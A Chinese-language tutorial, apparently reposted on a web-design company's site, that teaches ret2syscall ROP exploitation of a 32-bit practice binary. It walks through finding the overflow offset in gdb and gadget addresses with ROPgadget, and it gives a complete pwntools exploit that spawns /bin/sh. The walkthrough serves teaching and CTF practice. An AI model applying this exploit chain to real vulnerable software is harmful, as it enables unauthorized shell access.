本文視頻:
????????? 如果文字過于枯燥,可觀看在線視頻:https://edu.51cto.com/sd/16514
我們注重客戶提出的每個要求,我們充分考慮每一個細節(jié),我們積極的做好網(wǎng)站設(shè)計制作、網(wǎng)站建設(shè)服務(wù),我們努力開拓更好的視野,通過不懈的努力,創(chuàng)新互聯(lián)建站贏得了業(yè)內(nèi)的良好聲譽,這一切,也不斷的激勵著我們更好的服務(wù)客戶。 主要業(yè)務(wù):網(wǎng)站建設(shè),網(wǎng)站制作,網(wǎng)站設(shè)計,小程序開發(fā),網(wǎng)站開發(fā),技術(shù)開發(fā)實力,DIV+CSS,PHP及ASP,ASP.Net,SQL數(shù)據(jù)庫的技術(shù)開發(fā)工程師。
基礎(chǔ)知識:
???????? 我們在前面講的ret2text,ret2shellcode,今天來講下ret2syscall,也就是調(diào)用系統(tǒng)函數(shù)來獲取shell.
這里在講兩個概念:第一:ROP(Return-oriented programming),是一種基于代碼復(fù)用技術(shù)的新型***,***者供已有的庫或可執(zhí)行文件中提取指令片段、構(gòu)建惡意代碼。
第二:Gadgets是指在程序中的指令片段,有時我們?yōu)榱诉_到我們執(zhí)行命令的目的,需要多個Gadget來完成我們的功能。Gadget最后一般都有ret,因為要講程序控制權(quán)(ip)給下一個Gadget。
第一步:分析程序獲取溢出偏移量
我們先將程序拖到IDA中去分析(要注意32的程序就要用32位的IDA去分析,64的程序就要用64位的IDA去分析,如果不這么做F5看C的偽代碼時看不了。)
第八行里又一個gets函數(shù)是有溢出漏洞的,這個問題我們在ret2shellcode里已經(jīng)講過了。此時我們要使用gdb里的pattern offset來獲取溢出偏移量,這次我們換種方法獲取。使用gdb打開ret2syscall。
在gets函數(shù)位置打斷點:b gets 然后輸入r開始調(diào)試
在輸入finish(結(jié)束當(dāng)前函數(shù)調(diào)用,返回上層函數(shù))
輸入幾個字母,這里我輸入的是margin,然后回車
此時我們發(fā)現(xiàn)ebp的地址是0xffffd618 , esp的值是0xffffd5ac,要覆蓋的ebp需要esp - ebp=0x6c位,在加上4位的ebp為112,所以我們要覆蓋到返回值,執(zhí)行我們的命令。
第二步:獲取shell
我們知道溢出偏移量了,現(xiàn)在我們想執(zhí)行命令,例如execve("/bin/sh",null,null)。此時要設(shè)計到Linux在調(diào)用系統(tǒng)函數(shù)時的用法。
系統(tǒng)函數(shù)調(diào)用的指令是int 0x80,這是固定指令,他有四個參數(shù):
系統(tǒng)調(diào)用號,即 eax 應(yīng)該為 0xb
第一個參數(shù),即 ebx 應(yīng)該指向 /bin/sh 的地址,其實執(zhí)行 sh 的地址也可以。
第二個參數(shù),即 ecx 應(yīng)該為 0
第三個參數(shù),即 edx 應(yīng)該為 0
如果你學(xué)過任意一門編程語言,可以理解為int 0x80(eax,ebx,ecx,edx)??赡軙羞@樣的疑問:為什么是eax,ebx,ecx,edx要設(shè)置為這些值,答案是系統(tǒng)在運行的時候就是固定的要讀這四個寄存器,如果不這么寫,就不會調(diào)用到execve函數(shù)。
接下來我們就要一點點的去拼湊這些內(nèi)容,我們沒法直接在棧里寫指令,只能夠利用程序中自帶的指令去拼湊。
首先我們將eax設(shè)置為0xb,我們是沒法直接往棧里寫mov eax,0xb的,那么還有另一種方式是pop eax,但是要保證棧頂必須是0xb。
然后設(shè)置ebx,ecx,edx,同樣是這樣的道理,所以我們可以想象棧中的數(shù)據(jù)是:
pop eax;ret
0xb
pop ebx;pop ecx;pop edx;ret
"/bin/sh"的地址
0
0
int 0x80的地址
這樣我們就可以保值eax,ebx,ecx,edx的值了。
所以接下來我們要在程序中找一下有沒有pop eax;和pop ebx;pop ecx;pop edx;的指令。
需要用到一個工具:ROPgadget
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "eax"
--only是指只有pop和ret指令
我們使用0x080bb196,符合我們的預(yù)期。
接下來找類似pop ebx;pop ecx;pop edx;的指令
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx"
恰好也有我們所需要的,只不過順序和我們的不同,在組織payload時候需要調(diào)換下順序。
我們在找一下字符串“/bin/sh”的地址
ROPgadget --binary ./ret2syscall --string "/bin/sh"
地址為0x080be408
我們在查找下“int 0x80”的地址
ROPgadget --binary ./ret2syscall --only "int"
地址為0x08049421
所以我們現(xiàn)在有了所有我們需要的內(nèi)容了,接下來寫payload。
payload = 'a' * offset + pop_eax_ret_addr + 0xb + pop_edx_ecx_ebx_ret_addr + 0 + 0 + bin_sh_addr + 80_addr
得到exp
from pwn import *
sh = process('./ret2syscall')
pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = 'A' * 112 + p32(pop_eax_ret) +p32(0xb)+p32(pop_edx_ecx_ebx_ret)+ p32(0)+p32(0)+p32(binsh)+p32(int_0x80)
sh.sendline(payload)
sh.interactive()
最后,我們動態(tài)調(diào)試下這個程序,看我們把payload發(fā)送到程序中后,程序是如何執(zhí)行的。
我們在python代碼中的sh.sendline(payload)前面加pause(),這樣我們可以使程序中斷,然后用gdb attach pid進行調(diào)試
第一步:python代碼中加入sh.sendline(payload),然后執(zhí)行:python exp.py
我們的到這個進程的pid為4679,此時我們使用命令:gdb attach 4679進行調(diào)試
在gdb命令行輸入finish(結(jié)束當(dāng)前函數(shù),返回父級函數(shù)),這時候程序會等待我們輸入內(nèi)容,我們在運行python的頁面里回車,這時exp.py的payload就會被輸入到4679的進程里。
此時我們發(fā)現(xiàn)exp.py里的內(nèi)容已經(jīng)放入棧中,然后我們輸入4次finish后代碼運行到Main函數(shù)中
上圖標(biāo)紅的內(nèi)容就是我們payload里的內(nèi)容。
網(wǎng)頁名稱:緩沖區(qū)溢出-基本ROP-ret2syscall
本文來源:http://www.rwnh.cn/article2/gsppic.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供虛擬主機、建站公司、搜索引擎優(yōu)化、靜態(tài)網(wǎng)站、外貿(mào)網(wǎng)站建設(shè)、云服務(wù)器
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)